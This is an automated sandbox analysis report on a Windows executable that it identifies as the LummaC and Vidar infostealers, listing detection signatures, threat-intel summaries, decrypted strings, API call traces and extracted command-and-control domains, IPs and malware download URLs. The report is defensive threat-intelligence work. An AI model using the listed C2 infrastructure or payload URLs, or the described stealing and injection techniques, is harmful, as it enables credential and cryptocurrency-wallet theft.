Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1501434
MD5:	5095864caf019967467c5714897ee419
SHA1:	17e649d5784db18d790c77bdd300b9ff73dbf5ea
SHA256:	26047c08e200668e57088cb5b9577ed7975bf6309db51fe3544c54878430e8a3
Tags:	exe
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: condedqpwqm.shop	Avira URL Cloud: Label: phishing
Source: https://steamcommunity.com/profiles/76561199761128941	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/nss3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/sql.dll	Avira URL Cloud: Label: malware
Source: https://t.me/iyigunl	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/softokn3.dll	Avira URL Cloud: Label: malware
Source: stagedchheiqwo.shop	Avira URL Cloud: Label: phishing
Source: https://locatedblsoqp.shop/api	Avira URL Cloud: Label: phishing
Source: stamppreewntnq.shop	Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://awwardwiqi.shop/api	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exe	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/msvcp140.dll?	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/apibu	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/mozglue.dll	Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop	Avira URL Cloud: Label: phishing
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/api	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/freebl3.dll	Avira URL Cloud: Label: malware
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "4384b1ceb77dcf470b759bedd7bb140b"}
Source: 9.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["traineiwnqo.shop", "caffegclasiqwp.shop", "awwardwiqi.shop", "stamppreewntnq.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "condedqpwqm.shop", "locatedblsoqp.shop", "stagedchheiqwo.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\KJKJJJECFI.exe	ReversingLabs: Detection: 34%
Source: C:\ProgramData\KKJEBAAECB.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: caffegclasiqwp.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: stamppreewntnq.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: stagedchheiqwo.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: millyscroqwp.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: evoliutwoqm.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: condedqpwqm.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: traineiwnqo.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: locatedblsoqp.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: awwardwiqi.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: - Screen Resoluton:
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: Workgroup: -
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406AB6 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_00406AB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040F8D5 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	2_2_0040F8D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406A53 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00406A53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004083FA memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,PK11_FreeSlot,lstrcatA,	2_2_004083FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	2_2_6C0D6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C22A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6C22A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	2_2_6C1F4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C224440 PK11_PrivDecrypt,	2_2_6C224440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2244C0 PK11_PubEncrypt,	2_2_6C2244C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	2_2_6C2725B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C208670 PK11_ExportEncryptedPrivKeyInfo,	2_2_6C208670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C22A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	2_2_6C22A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C20E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	2_2_6C20E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C24A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	2_2_6C24A730

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: c:\rje\tg\h2r2\obj\Re\ease\etf.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2148380649.0000000035593000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2142626224.00000000296BC000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2385875761.000000001DB7B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: c:\rje\tg\obj\Re\ease\etf.pdb source: KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	12_2_004013B4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_0041391C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	9_2_0040C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	9_2_0040B810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-14h]	9_2_0043BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	9_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	9_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	9_2_00413846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	9_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_0041F862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch]	9_2_0043A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	9_2_004390C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	9_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	9_2_00413888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	9_2_0041D940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	9_2_00431950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-24h]	9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	9_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h	9_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	9_2_00413A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+18h]	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	9_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	9_2_0043F290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00423BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], ax	9_2_0041DBEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0043D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	9_2_0041C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	9_2_0041E411
